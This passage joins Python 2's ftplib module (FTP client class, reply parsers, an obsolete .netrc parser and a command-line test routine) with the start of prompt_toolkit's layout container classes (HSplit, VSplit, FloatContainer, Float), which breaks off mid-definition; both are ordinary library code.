ftp socket(s) If a timeout is passed, then this is now the default timeout for all ftp socket operations for this instance. Then use self.connect() with optional host and port argument. To download a file, use ftp.retrlines('RETR ' + filename), or ftp.retrbinary() with slightly different arguments. To upload a file, use ftp.storlines() or ftp.storbinary(), which have an open file as argument (see their definitions below for details). The download/upload functions first issue appropriate TYPE and PORT or PASV commands. ''' debugging = 0 host = '' port = FTP_PORT sock = None file = None welcome = None passiveserver = 1 # Initialization method (called by class instantiation). # Initialize host to localhost, port to standard ftp port # Optional arguments are host (for connect()), # and user, passwd, acct (for login()) def __init__(self, host='', user='', passwd='', acct='', timeout=_GLOBAL_DEFAULT_TIMEOUT): self.timeout = timeout if host: self.connect(host) if user: self.login(user, passwd, acct) def connect(self, host='', port=0, timeout=-999): '''Connect to host. Arguments are: - host: hostname to connect to (string, default previous host) - port: port to connect to (integer, default previous port) ''' if host != '': self.host = host if port > 0: self.port = port if timeout != -999: self.timeout = timeout self.sock = socket.create_connection((self.host, self.port), self.timeout) self.af = self.sock.family self.file = self.sock.makefile('rb') self.welcome = self.getresp() return self.welcome def getwelcome(self): '''Get the welcome message from the server. (this is read and squirreled away by connect())''' if self.debugging: print '*welcome*', self.sanitize(self.welcome) return self.welcome def set_debuglevel(self, level): '''Set the debugging level. The required argument level means: 0: no debugging output (default) 1: print commands and responses but not body text etc. 2: also print raw lines read and sent before stripping CR/LF''' self.debugging = level debug = set_debuglevel def set_pasv(self, val): '''Use passive or active mode for data transfers. With a false argument, use the normal PORT mode, With a true argument, use the PASV command.''' self.passiveserver = val # Internal: "sanitize" a string for printing def sanitize(self, s): if s[:5] == 'pass ' or s[:5] == 'PASS ': i = len(s) while i > 5 and s[i-1] in '\r\n': i = i-1 s = s[:5] + '*'*(i-5) + s[i:] return repr(s) # Internal: send one line to the server, appending CRLF def putline(self, line): line = line + CRLF if self.debugging > 1: print '*put*', self.sanitize(line) self.sock.sendall(line) # Internal: send one command to the server (through putline()) def putcmd(self, line): if self.debugging: print '*cmd*', self.sanitize(line) self.putline(line) # Internal: return one line from the server, stripping CRLF. # Raise EOFError if the connection is closed def getline(self): line = self.file.readline() if self.debugging > 1: print '*get*', self.sanitize(line) if not line: raise EOFError if line[-2:] == CRLF: line = line[:-2] elif line[-1:] in CRLF: line = line[:-1] return line # Internal: get a response from the server, which may possibly # consist of multiple lines. Return a single string with no # trailing CRLF. If the response consists of multiple lines, # these are separated by '\n' characters in the string def getmultiline(self): line = self.getline() if line[3:4] == '-': code = line[:3] while 1: nextline = self.getline() line = line + ('\n' + nextline) if nextline[:3] == code and \ nextline[3:4] != '-': break return line # Internal: get a response from the server. # Raise various errors if the response indicates an error def getresp(self): resp = self.getmultiline() if self.debugging: print '*resp*', self.sanitize(resp) self.lastresp = resp[:3] c = resp[:1] if c in ('1', '2', '3'): return resp if c == '4': raise error_temp, resp if c == '5': raise error_perm, resp raise error_proto, resp def voidresp(self): """Expect a response beginning with '2'.""" resp = self.getresp() if resp[0] != '2': raise error_reply, resp return resp def abort(self): '''Abort a file transfer. Uses out-of-band data. This does not follow the procedure from the RFC to send Telnet IP and Synch; that doesn't seem to work with the servers I've tried. Instead, just send the ABOR command as OOB data.''' line = 'ABOR' + CRLF if self.debugging > 1: print '*put urgent*', self.sanitize(line) self.sock.sendall(line, MSG_OOB) resp = self.getmultiline() if resp[:3] not in ('426', '226'): raise error_proto, resp def sendcmd(self, cmd): '''Send a command and return the response.''' self.putcmd(cmd) return self.getresp() def voidcmd(self, cmd): """Send a command and expect a response beginning with '2'.""" self.putcmd(cmd) return self.voidresp() def sendport(self, host, port): '''Send a PORT command with the current host and the given port number. ''' hbytes = host.split('.') pbytes = [repr(port//256), repr(port%256)] bytes = hbytes + pbytes cmd = 'PORT ' + ','.join(bytes) return self.voidcmd(cmd) def sendeprt(self, host, port): '''Send a EPRT command with the current host and the given port number.''' af = 0 if self.af == socket.AF_INET: af = 1 if self.af == socket.AF_INET6: af = 2 if af == 0: raise error_proto, 'unsupported address family' fields = ['', repr(af), host, repr(port), ''] cmd = 'EPRT ' + '|'.join(fields) return self.voidcmd(cmd) def makeport(self): '''Create a new socket and send a PORT command for it.''' msg = "getaddrinfo returns an empty list" sock = None for res in socket.getaddrinfo(None, 0, self.af, socket.SOCK_STREAM, 0, socket.AI_PASSIVE): af, socktype, proto, canonname, sa = res try: sock = socket.socket(af, socktype, proto) sock.bind(sa) except socket.error, msg: if sock: sock.close() sock = None continue break if not sock: raise socket.error, msg sock.listen(1) port = sock.getsockname()[1] # Get proper port host = self.sock.getsockname()[0] # Get proper host if self.af == socket.AF_INET: resp = self.sendport(host, port) else: resp = self.sendeprt(host, port) return sock def makepasv(self): if self.af == socket.AF_INET: host, port = parse227(self.sendcmd('PASV')) else: host, port = parse229(self.sendcmd('EPSV'), self.sock.getpeername()) return host, port def ntransfercmd(self, cmd, rest=None): """Initiate a transfer over the data connection. If the transfer is active, send a port command and the transfer command, and accept the connection. If the server is passive, send a pasv command, connect to it, and start the transfer command. Either way, return the socket for the connection and the expected size of the transfer. The expected size may be None if it could not be determined. Optional `rest' argument can be a string that is sent as the argument to a REST command. This is essentially a server marker used to tell the server to skip over any data up to the given marker. """ size = None if self.passiveserver: host, port = self.makepasv() conn = socket.create_connection((host, port), self.timeout) if rest is not None: self.sendcmd("REST %s" % rest) resp = self.sendcmd(cmd) # Some servers apparently send a 200 reply to # a LIST or STOR command, before the 150 reply # (and way before the 226 reply). This seems to # be in violation of the protocol (which only allows # 1xx or error messages for LIST), so we just discard # this response. if resp[0] == '2': resp = self.getresp() if resp[0] != '1': raise error_reply, resp else: sock = self.makeport() if rest is not None: self.sendcmd("REST %s" % rest) resp = self.sendcmd(cmd) # See above. if resp[0] == '2': resp = self.getresp() if resp[0] != '1': raise error_reply, resp conn, sockaddr = sock.accept() if resp[:3] == '150': # this is conditional in case we received a 125 size = parse150(resp) return conn, size def transfercmd(self, cmd, rest=None): """Like ntransfercmd() but returns only the socket.""" return self.ntransfercmd(cmd, rest)[0] def login(self, user = '', passwd = '', acct = ''): '''Login, default anonymous.''' if not user: user = 'anonymous' if not passwd: passwd = '' if not acct: acct = '' if user == 'anonymous' and passwd in ('', '-'): # If there is no anonymous ftp password specified # then we'll just use anonymous@ # We don't send any other thing because: # - We want to remain anonymous # - We want to stop SPAM # - We don't want to let ftp sites to discriminate by the user, # host or country. passwd = passwd + 'anonymous@' resp = self.sendcmd('USER ' + user) if resp[0] == '3': resp = self.sendcmd('PASS ' + passwd) if resp[0] == '3': resp = self.sendcmd('ACCT ' + acct) if resp[0] != '2': raise error_reply, resp return resp def retrbinary(self, cmd, callback, blocksize=8192, rest=None): """Retrieve data in binary mode. A new port is created for you. Args: cmd: A RETR command. callback: A single parameter callable to be called on each block of data read. blocksize: The maximum number of bytes to read from the socket at one time. [default: 8192] rest: Passed to transfercmd(). [default: None] Returns: The response code. """ self.voidcmd('TYPE I') conn = self.transfercmd(cmd, rest) while 1: data = conn.recv(blocksize) if not data: break callback(data) conn.close() return self.voidresp() def retrlines(self, cmd, callback = None): """Retrieve data in line mode. A new port is created for you. Args: cmd: A RETR, LIST, NLST, or MLSD command. callback: An optional single parameter callable that is called for each line with the trailing CRLF stripped. [default: print_line()] Returns: The response code. """ if callback is None: callback = print_line resp = self.sendcmd('TYPE A') conn = self.transfercmd(cmd) fp = conn.makefile('rb') while 1: line = fp.readline() if self.debugging > 2: print '*retr*', repr(line) if not line: break if line[-2:] == CRLF: line = line[:-2] elif line[-1:] == '\n': line = line[:-1] callback(line) fp.close() conn.close() return self.voidresp() def storbinary(self, cmd, fp, blocksize=8192, callback=None): """Store a file in binary mode. A new port is created for you. Args: cmd: A STOR command. fp: A file-like object with a read(num_bytes) method. blocksize: The maximum data size to read from fp and send over the connection at once. [default: 8192] callback: An optional single parameter callable that is called on on each block of data after it is sent. [default: None] Returns: The response code. """ self.voidcmd('TYPE I') conn = self.transfercmd(cmd) while 1: buf = fp.read(blocksize) if not buf: break conn.sendall(buf) if callback: callback(buf) conn.close() return self.voidresp() def storlines(self, cmd, fp, callback=None): """Store a file in line mode. A new port is created for you. Args: cmd: A STOR command. fp: A file-like object with a readline() method. callback: An optional single parameter callable that is called on on each line after it is sent. [default: None] Returns: The response code. """ self.voidcmd('TYPE A') conn = self.transfercmd(cmd) while 1: buf = fp.readline() if not buf: break if buf[-2:] != CRLF: if buf[-1] in CRLF: buf = buf[:-1] buf = buf + CRLF conn.sendall(buf) if callback: callback(buf) conn.close() return self.voidresp() def acct(self, password): '''Send new account name.''' cmd = 'ACCT ' + password return self.voidcmd(cmd) def nlst(self, *args): '''Return a list of files in a given directory (default the current).''' cmd = 'NLST' for arg in args: cmd = cmd + (' ' + arg) files = [] self.retrlines(cmd, files.append) return files def dir(self, *args): '''List a directory in long form. By default list current directory to stdout. Optional last argument is callback function; all non-empty arguments before it are concatenated to the LIST command. (This *should* only be used for a pathname.)''' cmd = 'LIST' func = None if args[-1:] and type(args[-1]) != type(''): args, func = args[:-1], args[-1] for arg in args: if arg: cmd = cmd + (' ' + arg) self.retrlines(cmd, func) def rename(self, fromname, toname): '''Rename a file.''' resp = self.sendcmd('RNFR ' + fromname) if resp[0] != '3': raise error_reply, resp return self.voidcmd('RNTO ' + toname) def delete(self, filename): '''Delete a file.''' resp = self.sendcmd('DELE ' + filename) if resp[:3] in ('250', '200'): return resp elif resp[:1] == '5': raise error_perm, resp else: raise error_reply, resp def cwd(self, dirname): '''Change to a directory.''' if dirname == '..': try: return self.voidcmd('CDUP') except error_perm, msg: if msg.args[0][:3] != '500': raise elif dirname == '': dirname = '.' # does nothing, but could return error cmd = 'CWD ' + dirname return self.voidcmd(cmd) def size(self, filename): '''Retrieve the size of a file.''' # The SIZE command is defined in RFC-3659 resp = self.sendcmd('SIZE ' + filename) if resp[:3] == '213': s = resp[3:].strip() try: return int(s) except (OverflowError, ValueError): return long(s) def mkd(self, dirname): '''Make a directory, return its full pathname.''' resp = self.sendcmd('MKD ' + dirname) return parse257(resp) def rmd(self, dirname): '''Remove a directory.''' return self.voidcmd('RMD ' + dirname) def pwd(self): '''Return current working directory.''' resp = self.sendcmd('PWD') return parse257(resp) def quit(self): '''Quit, and close the connection.''' resp = self.voidcmd('QUIT') self.close() return resp def close(self): '''Close the connection without assuming anything about it.''' if self.file: self.file.close() self.sock.close() self.file = self.sock = None _150_re = None def parse150(resp): '''Parse the '150' response for a RETR request. Returns the expected transfer size or None; size is not guaranteed to be present in the 150 message. ''' if resp[:3] != '150': raise error_reply, resp global _150_re if _150_re is None: import re _150_re = re.compile("150 .* \((\d+) bytes\)", re.IGNORECASE) m = _150_re.match(resp) if not m: return None s = m.group(1) try: return int(s) except (OverflowError, ValueError): return long(s) _227_re = None def parse227(resp): '''Parse the '227' response for a PASV request. Raises error_proto if it does not contain '(h1,h2,h3,h4,p1,p2)' Return ('host.addr.as.numbers', port#) tuple.''' if resp[:3] != '227': raise error_reply, resp global _227_re if _227_re is None: import re _227_re = re.compile(r'(\d+),(\d+),(\d+),(\d+),(\d+),(\d+)') m = _227_re.search(resp) if not m: raise error_proto, resp numbers = m.groups() host = '.'.join(numbers[:4]) port = (int(numbers[4]) << 8) + int(numbers[5]) return host, port def parse229(resp, peer): '''Parse the '229' response for a EPSV request. Raises error_proto if it does not contain '(|||port|)' Return ('host.addr.as.numbers', port#) tuple.''' if resp[:3] != '229': raise error_reply, resp left = resp.find('(') if left < 0: raise error_proto, resp right = resp.find(')', left + 1) if right < 0: raise error_proto, resp # should contain '(|||port|)' if resp[left + 1] != resp[right - 1]: raise error_proto, resp parts = resp[left + 1:right].split(resp[left+1]) if len(parts) != 5: raise error_proto, resp host = peer[0] port = int(parts[3]) return host, port def parse257(resp): '''Parse the '257' response for a MKD or PWD request. This is a response to a MKD or PWD request: a directory name. Returns the directoryname in the 257 reply.''' if resp[:3] != '257': raise error_reply, resp if resp[3:5] != ' "': return '' # Not compliant to RFC 959, but UNIX ftpd does this dirname = '' i = 5 n = len(resp) while i < n: c = resp[i] i = i+1 if c == '"': if i >= n or resp[i] != '"': break i = i+1 dirname = dirname + c return dirname def print_line(line): '''Default retrlines callback to print a line.''' print line def ftpcp(source, sourcename, target, targetname = '', type = 'I'): '''Copy file from one FTP-instance to another.''' if not targetname: targetname = sourcename type = 'TYPE ' + type source.voidcmd(type) target.voidcmd(type) sourcehost, sourceport = parse227(source.sendcmd('PASV')) target.sendport(sourcehost, sourceport) # RFC 959: the user must "listen" [...] BEFORE sending the # transfer request. # So: STOR before RETR, because here the target is a "user". treply = target.sendcmd('STOR ' + targetname) if treply[:3] not in ('125', '150'): raise error_proto # RFC 959 sreply = source.sendcmd('RETR ' + sourcename) if sreply[:3] not in ('125', '150'): raise error_proto # RFC 959 source.voidresp() target.voidresp() class Netrc: """Class to parse & provide access to 'netrc' format files. See the netrc(4) man page for information on the file format. WARNING: This class is obsolete -- use module netrc instead. """ __defuser = None __defpasswd = None __defacct = None def __init__(self, filename=None): if filename is None: if "HOME" in os.environ: filename = os.path.join(os.environ["HOME"], ".netrc") else: raise IOError, \ "specify file to load or set $HOME" self.__hosts = {} self.__macros = {} fp = open(filename, "r") in_macro = 0 while 1: line = fp.readline() if not line: break if in_macro and line.strip(): macro_lines.append(line) continue elif in_macro: self.__macros[macro_name] = tuple(macro_lines) in_macro = 0 words = line.split() host = user = passwd = acct = None default = 0 i = 0 while i < len(words): w1 = words[i] if i+1 < len(words): w2 = words[i + 1] else: w2 = None if w1 == 'default': default = 1 elif w1 == 'machine' and w2: host = w2.lower() i = i + 1 elif w1 == 'login' and w2: user = w2 i = i + 1 elif w1 == 'password' and w2: passwd = w2 i = i + 1 elif w1 == 'account' and w2: acct = w2 i = i + 1 elif w1 == 'macdef' and w2: macro_name = w2 macro_lines = [] in_macro = 1 break i = i + 1 if default: self.__defuser = user or self.__defuser self.__defpasswd = passwd or self.__defpasswd self.__defacct = acct or self.__defacct if host: if host in self.__hosts: ouser, opasswd, oacct = \ self.__hosts[host] user = user or ouser passwd = passwd or opasswd acct = acct or oacct self.__hosts[host] = user, passwd, acct fp.close() def get_hosts(self): """Return a list of hosts mentioned in the .netrc file.""" return self.__hosts.keys() def get_account(self, host): """Returns login information for the named host. The return value is a triple containing userid, password, and the accounting field. """ host = host.lower() user = passwd = acct = None if host in self.__hosts: user, passwd, acct = self.__hosts[host] user = user or self.__defuser passwd = passwd or self.__defpasswd acct = acct or self.__defacct return user, passwd, acct def get_macros(self): """Return a list of all defined macro names.""" return self.__macros.keys() def get_macro(self, macro): """Return a sequence of lines which define a named macro.""" return self.__macros[macro] def test(): '''Test program. Usage: ftp [-d] [-r[file]] host [-l[dir]] [-d[dir]] [-p] [file] ... -d dir -l list -p password ''' if len(sys.argv) < 2: print test.__doc__ sys.exit(0) debugging = 0 rcfile = None while sys.argv[1] == '-d': debugging = debugging+1 del sys.argv[1] if sys.argv[1][:2] == '-r': # get name of alternate ~/.netrc file: rcfile = sys.argv[1][2:] del sys.argv[1] host = sys.argv[1] ftp = FTP(host) ftp.set_debuglevel(debugging) userid = passwd = acct = '' try: netrc = Netrc(rcfile) except IOError: if rcfile is not None: sys.stderr.write("Could not open account file" " -- using anonymous login.") else: try: userid, passwd, acct = netrc.get_account(host) except KeyError: # no account for host sys.stderr.write( "No account -- using anonymous login.") ftp.login(userid, passwd, acct) for file in sys.argv[2:]: if file[:2] == '-l': ftp.dir(file[2:]) elif file[:2] == '-d': cmd = 'CWD' if file[2:]: cmd = cmd + ' ' + file[2:] resp = ftp.sendcmd(cmd) elif file == '-p': ftp.set_pasv(not ftp.passiveserver) else: ftp.retrbinary('RETR ' + file, \ sys.stdout.write, 1024) ftp.quit() if __name__ == '__main__': test()
""" Container for the layout. (Containers can contain other containers or user interface controls.) """ from __future__ import unicode_literals from abc import ABCMeta, abstractmethod from six import with_metaclass from six.moves import range from .controls import UIControl, TokenListControl, UIContent from .dimension import LayoutDimension, sum_layout_dimensions, max_layout_dimensions from .margins import Margin from .screen import Point, WritePosition, _CHAR_CACHE from .utils import token_list_to_text, explode_tokens from prompt_toolkit.cache import SimpleCache from prompt_toolkit.filters import to_cli_filter, ViInsertMode, EmacsInsertMode from prompt_toolkit.mouse_events import MouseEvent, MouseEventType from prompt_toolkit.reactive import Integer from prompt_toolkit.token import Token from prompt_toolkit.utils import take_using_weights, get_cwidth __all__ = ( 'Container', 'HSplit', 'VSplit', 'FloatContainer', 'Float', 'Window', 'WindowRenderInfo', 'ConditionalContainer', 'ScrollOffsets', 'ColorColumn', ) Transparent = Token.Transparent class Container(with_metaclass(ABCMeta, object)): """ Base class for user interface layout. """ @abstractmethod def reset(self): """ Reset the state of this container and all the children. (E.g. reset scroll offsets, etc...) """ @abstractmethod def preferred_width(self, cli, max_available_width): """ Return a :class:`~prompt_toolkit.layout.dimension.LayoutDimension` that represents the desired width for this container. :param cli: :class:`~prompt_toolkit.interface.CommandLineInterface`. """ @abstractmethod def preferred_height(self, cli, width, max_available_height): """ Return a :class:`~prompt_toolkit.layout.dimension.LayoutDimension` that represents the desired height for this container. :param cli: :class:`~prompt_toolkit.interface.CommandLineInterface`. """ @abstractmethod def write_to_screen(self, cli, screen, mouse_handlers, write_position): """ Write the actual content to the screen. :param cli: :class:`~prompt_toolkit.interface.CommandLineInterface`. :param screen: :class:`~prompt_toolkit.layout.screen.Screen` :param mouse_handlers: :class:`~prompt_toolkit.layout.mouse_handlers.MouseHandlers`. """ @abstractmethod def walk(self, cli): """ Walk through all the layout nodes (and their children) and yield them. """ def _window_too_small(): " Create a `Window` that displays the 'Window too small' text. " return Window(TokenListControl.static( [(Token.WindowTooSmall, ' Window too small... ')])) class HSplit(Container): """ Several layouts, one stacked above/under the other. :param children: List of child :class:`.Container` objects. :param window_too_small: A :class:`.Container` object that is displayed if there is not enough space for all the children. By default, this is a "Window too small" message. :param get_dimensions: (`None` or a callable that takes a `CommandLineInterface` and returns a list of `LayoutDimension` instances.) By default the dimensions are taken from the children and divided by the available space. However, when `get_dimensions` is specified, this is taken instead. :param report_dimensions_callback: When rendering, this function is called with the `CommandLineInterface` and the list of used dimensions. (As a list of integers.) """ def __init__(self, children, window_too_small=None, get_dimensions=None, report_dimensions_callback=None): assert all(isinstance(c, Container) for c in children) assert window_too_small is None or isinstance(window_too_small, Container) assert get_dimensions is None or callable(get_dimensions) assert report_dimensions_callback is None or callable(report_dimensions_callback) self.children = children self.window_too_small = window_too_small or _window_too_small() self.get_dimensions = get_dimensions self.report_dimensions_callback = report_dimensions_callback def preferred_width(self, cli, max_available_width): if self.children: dimensions = [c.preferred_width(cli, max_available_width) for c in self.children] return max_layout_dimensions(dimensions) else: return LayoutDimension(0) def preferred_height(self, cli, width, max_available_height): dimensions = [c.preferred_height(cli, width, max_available_height) for c in self.children] return sum_layout_dimensions(dimensions) def reset(self): for c in self.children: c.reset() def write_to_screen(self, cli, screen, mouse_handlers, write_position): """ Render the prompt to a `Screen` instance. :param screen: The :class:`~prompt_toolkit.layout.screen.Screen` class to which the output has to be written. """ sizes = self._divide_heigths(cli, write_position) if self.report_dimensions_callback: self.report_dimensions_callback(cli, sizes) if sizes is None: self.window_too_small.write_to_screen( cli, screen, mouse_handlers, write_position) else: # Draw child panes. ypos = write_position.ypos xpos = write_position.xpos width = write_position.width for s, c in zip(sizes, self.children): c.write_to_screen(cli, screen, mouse_handlers, WritePosition(xpos, ypos, width, s)) ypos += s def _divide_heigths(self, cli, write_position): """ Return the heights for all rows. Or None when there is not enough space. """ if not self.children: return [] # Calculate heights. given_dimensions = self.get_dimensions(cli) if self.get_dimensions else None def get_dimension_for_child(c, index): if given_dimensions and given_dimensions[index] is not None: return given_dimensions[index] else: return c.preferred_height(cli, write_position.width, write_position.extended_height) dimensions = [get_dimension_for_child(c, index) for index, c in enumerate(self.children)] # Sum dimensions sum_dimensions = sum_layout_dimensions(dimensions) # If there is not enough space for both. # Don't do anything. if sum_dimensions.min > write_position.extended_height: return # Find optimal sizes. (Start with minimal size, increase until we cover # the whole height.) sizes = [d.min for d in dimensions] child_generator = take_using_weights( items=list(range(len(dimensions))), weights=[d.weight for d in dimensions]) i = next(child_generator) while sum(sizes) < min(write_position.extended_height, sum_dimensions.preferred): # Increase until we meet at least the 'preferred' size. if sizes[i] < dimensions[i].preferred: sizes[i] += 1 i = next(child_generator) if not any([cli.is_returning, cli.is_exiting, cli.is_aborting]): while sum(sizes) < min(write_position.height, sum_dimensions.max): # Increase until we use all the available space. (or until "max") if sizes[i] < dimensions[i].max: sizes[i] += 1 i = next(child_generator) return sizes def walk(self, cli): """ Walk through children. """ yield self for c in self.children: for i in c.walk(cli): yield i class VSplit(Container): """ Several layouts, one stacked left/right of the other. :param children: List of child :class:`.Container` objects. :param window_too_small: A :class:`.Container` object that is displayed if there is not enough space for all the children. By default, this is a "Window too small" message. :param get_dimensions: (`None` or a callable that takes a `CommandLineInterface` and returns a list of `LayoutDimension` instances.) By default the dimensions are taken from the children and divided by the available space. However, when `get_dimensions` is specified, this is taken instead. :param report_dimensions_callback: When rendering, this function is called with the `CommandLineInterface` and the list of used dimensions. (As a list of integers.) """ def __init__(self, children, window_too_small=None, get_dimensions=None, report_dimensions_callback=None): assert all(isinstance(c, Container) for c in children) assert window_too_small is None or isinstance(window_too_small, Container) assert get_dimensions is None or callable(get_dimensions) assert report_dimensions_callback is None or callable(report_dimensions_callback) self.children = children self.window_too_small = window_too_small or _window_too_small() self.get_dimensions = get_dimensions self.report_dimensions_callback = report_dimensions_callback def preferred_width(self, cli, max_available_width): dimensions = [c.preferred_width(cli, max_available_width) for c in self.children] return sum_layout_dimensions(dimensions) def preferred_height(self, cli, width, max_available_height): sizes = self._divide_widths(cli, width) if sizes is None: return LayoutDimension() else: dimensions = [c.preferred_height(cli, s, max_available_height) for s, c in zip(sizes, self.children)] return max_layout_dimensions(dimensions) def reset(self): for c in self.children: c.reset() def _divide_widths(self, cli, width): """ Return the widths for all columns. Or None when there is not enough space. """ if not self.children: return [] # Calculate widths. given_dimensions = self.get_dimensions(cli) if self.get_dimensions else None def get_dimension_for_child(c, index): if given_dimensions and given_dimensions[index] is not None: return given_dimensions[index] else: return c.preferred_width(cli, width) dimensions = [get_dimension_for_child(c, index) for index, c in enumerate(self.children)] # Sum dimensions sum_dimensions = sum_layout_dimensions(dimensions) # If there is not enough space for both. # Don't do anything. if sum_dimensions.min > width: return # Find optimal sizes. (Start with minimal size, increase until we cover # the whole height.) sizes = [d.min for d in dimensions] child_generator = take_using_weights( items=list(range(len(dimensions))), weights=[d.weight for d in dimensions]) i = next(child_generator) while sum(sizes) < min(width, sum_dimensions.preferred): # Increase until we meet at least the 'preferred' size. if sizes[i] < dimensions[i].preferred: sizes[i] += 1 i = next(child_generator) while sum(sizes) < min(width, sum_dimensions.max): # Increase until we use all the available space. if sizes[i] < dimensions[i].max: sizes[i] += 1 i = next(child_generator) return sizes def write_to_screen(self, cli, screen, mouse_handlers, write_position): """ Render the prompt to a `Screen` instance. :param screen: The :class:`~prompt_toolkit.layout.screen.Screen` class to which the output has to be written. """ if not self.children: return sizes = self._divide_widths(cli, write_position.width) if self.report_dimensions_callback: self.report_dimensions_callback(cli, sizes) # If there is not enough space. if sizes is None: self.window_too_small.write_to_screen( cli, screen, mouse_handlers, write_position) return # Calculate heights, take the largest possible, but not larger than write_position.extended_height. heights = [child.preferred_height(cli, width, write_position.extended_height).preferred for width, child in zip(sizes, self.children)] height = max(write_position.height, min(write_position.extended_height, max(heights))) # Draw child panes. ypos = write_position.ypos xpos = write_position.xpos for s, c in zip(sizes, self.children): c.write_to_screen(cli, screen, mouse_handlers, WritePosition(xpos, ypos, s, height)) xpos += s def walk(self, cli): """ Walk through children. """ yield self for c in self.children: for i in c.walk(cli): yield i class FloatContainer(Container): """ Container which can contain another container for the background, as well as a list of floating containers on top of it. Example Usage:: FloatContainer(content=Window(...), floats=[ Float(xcursor=True, ycursor=True, layout=CompletionMenu(...)) ]) """ def __init__(self, content, floats): assert isinstance(content, Container) assert all(isinstance(f, Float) for f in floats) self.content = content self.floats = floats def reset(self): self.content.reset() for f in self.floats: f.content.reset() def preferred_width(self, cli, write_position): return self.content.preferred_width(cli, write_position) def preferred_height(self, cli, width, max_available_height): """ Return the preferred height of the float container. (We don't care about the height of the floats, they should always fit into the dimensions provided by the container.) """ return self.content.preferred_height(cli, width, max_available_height) def write_to_screen(self, cli, screen, mouse_handlers, write_position): self.content.write_to_screen(cli, screen, mouse_handlers, write_position) for fl in self.floats: # When a menu_position was given, use this instead of the cursor # position. (These cursor positions are absolute, translate again # relative to the write_position.) # Note: This should be inside the for-loop, because one float could # set the cursor position to be used for the next one. cursor_position = screen.menu_position or screen.cursor_position cursor_position = Point(x=cursor_position.x - write_position.xpos, y=cursor_position.y - write_position.ypos) fl_width = fl.get_width(cli) fl_height = fl.get_height(cli) # Left & width given. if fl.left is not None and fl_width is not None: xpos = fl.left width = fl_width # Left & right given -> calculate width. elif fl.left is not None and fl.right is not None: xpos = fl.left width = write_position.width - fl.left - fl.right # Width & right given -> calculate left. elif fl_width is not None and fl.right is not None: xpos = write_position.width - fl.right - fl_width width = fl_width elif fl.xcursor: width = fl_width if width is None: width = fl.content.preferred_width(cli, write_position.width).preferred width = min(write_position.width, width) xpos = cursor_position.x if xpos + width > write_position.width: xpos = max(0, write_position.width - width) # Only width given -> center horizontally. elif fl_width: xpos = int((write_position.width - fl_width) / 2) width = fl_width # Otherwise, take preferred width from float content. else: width = fl.content.preferred_width(cli, write_position.width).preferred if fl.left is not None: xpos = fl.left elif fl.right is not None: xpos = max(0, write_position.width - width - fl.right) else: # Center horizontally. xpos = max(0, int((write_position.width - width) / 2)) # Trim. width = min(width, write_position.width - xpos) # Top & height given. if fl.top is not None and fl_height is not None: ypos = fl.top height = fl_height # Top & bottom given -> calculate height. elif fl.top is not None and fl.bottom is not None: ypos = fl.top height = write_position.height - fl.top - fl.bottom # Height & bottom given -> calculate top. elif fl_height is not None and fl.bottom is not None: ypos = write_position.height - fl_height - fl.bottom height = fl_height # Near cursor elif fl.ycursor: ypos = cursor_position.y + 1 height = fl_height if height is None: height = fl.content.preferred_height( cli, width, write_position.extended_height).preferred # Reduce height if not enough space. (We can use the # extended_height when the content requires it.) if height > write_position.extended_height - ypos: if write_position.extended_height - ypos + 1 >= ypos: # When the space below the cursor is more than # the space above, just reduce the height. height = write_position.extended_height - ypos else: # Otherwise, fit the float above the cursor. height = min(height, cursor_position.y) ypos = cursor_position.y - height # Only height given -> center vertically. elif fl_width: ypos = int((write_position.height - fl_height) / 2) height = fl_height # Otherwise, take preferred height from content. else: height = fl.content.preferred_height( cli, width, write_position.extended_height).preferred if fl.top is not None: ypos = fl.top elif fl.bottom is not None: ypos = max(0, write_position.height - height - fl.bottom) else: # Center vertically. ypos = max(0, int((write_position.height - height) / 2)) # Trim. height = min(height, write_position.height - ypos) # Write float. # (xpos and ypos can be negative: a float can be partially visible.) if height > 0 and width > 0: wp = WritePosition(xpos=xpos + write_position.xpos, ypos=ypos + write_position.ypos, width=width, height=height) if not fl.hide_when_covering_content or self._area_is_empty(screen, wp): fl.content.write_to_screen(cli, screen, mouse_handlers, wp) def _area_is_empty(self, screen, write_position): """ Return True when the area below the write position is still empty. (For floats that should not hide content underneath.) """ wp = write_position Transparent = Token.Transparent for y in range(wp.ypos, wp.ypos + wp.height): if y in screen.data_buffer: row = screen.data_buffer[y] for x in range(wp.xpos, wp.xpos + wp.width): c = row[x] if c.char != ' ' or c.token != Transparent: return False return True def walk(self, cli): """ Walk through children. """ yield self for i in self.content.walk(cli): yield i for f in self.floats: for i in f.content.walk(cli): yield i class Float(object): """ Float for use in a :class:`.FloatContainer`. :param content: :class:`.Container` instance. :param hide_when_covering_content: Hide the float when it covers content underneath. """ def __init__(self, top=None, right=None, bottom=None, left=None, width=None, height=None, get_width=None, get_height=None, xcursor=False, ycursor=False, content=None, hide_when_covering_content=False): assert isinstance(content, Container) assert width is None or get_width is None assert height is None or get_height is None self.left = left self.right = right self.top = top self.bottom = bottom self._width = width self._height = height self._get_width = get_width self._get_height = get_height self.xcursor = xcursor self.ycursor = ycursor self.content = content self.hide_when_covering_content = hide_when_covering_content def get_width(self, cli): if self._width: return self._width if self._get_width: return self._get_width(cli) def get_height(self, cli): if self._height: return self._height if self._get_height: return self._get_height(cli) def __repr__(self): return 'Float(content=%r)' % self.content class WindowRenderInfo(object): """ Render information, for the last render time of this control. It stores mapping information between the input buffers (in case of a :class:`~prompt_toolkit.layout.controls.BufferControl`) and the actual render position on the output screen. (Could be used for implementation of the Vi 'H' and 'L' key bindings as well as implementing mouse support.) :param ui_content: The original :class:`.UIContent` instance that contains the whole input, without clipping. (ui_content) :param horizontal_scroll: The horizontal scroll of the :class:`.Window` instance. :param vertical_scroll: The vertical scroll of the :class:`.Window` instance. :param window_width: The width of the window that displays the content, without the margins. :param window_height: The height of the window that displays the content. :param configured_scroll_offsets: The scroll offsets as configured for the :class:`Window` instance. :param visible_line_to_row_col: Mapping that maps the row numbers on the displayed screen (starting from zero for the first visible line) to (row, col) tuples pointing to the row and column of the :class:`.UIContent`. :param rowcol_to_yx: Mapping that maps (row, column) tuples representing coordinates of the :class:`UIContent` to (y, x) absolute coordinates at the rendered screen. """ def __init__(self, ui_content, horizontal_scroll, vertical_scroll, window_width, window_height, configured_scroll_offsets, visible_line_to_row_col, rowcol_to_yx, x_offset, y_offset, wrap_lines): assert isinstance(ui_content, UIContent) assert isinstance(horizontal_scroll, int) assert isinstance(vertical_scroll, int) assert isinstance(window_width, int) assert isinstance(window_height, int) assert isinstance(configured_scroll_offsets, ScrollOffsets) assert isinstance(visible_line_to_row_col, dict) assert isinstance(rowcol_to_yx, dict) assert 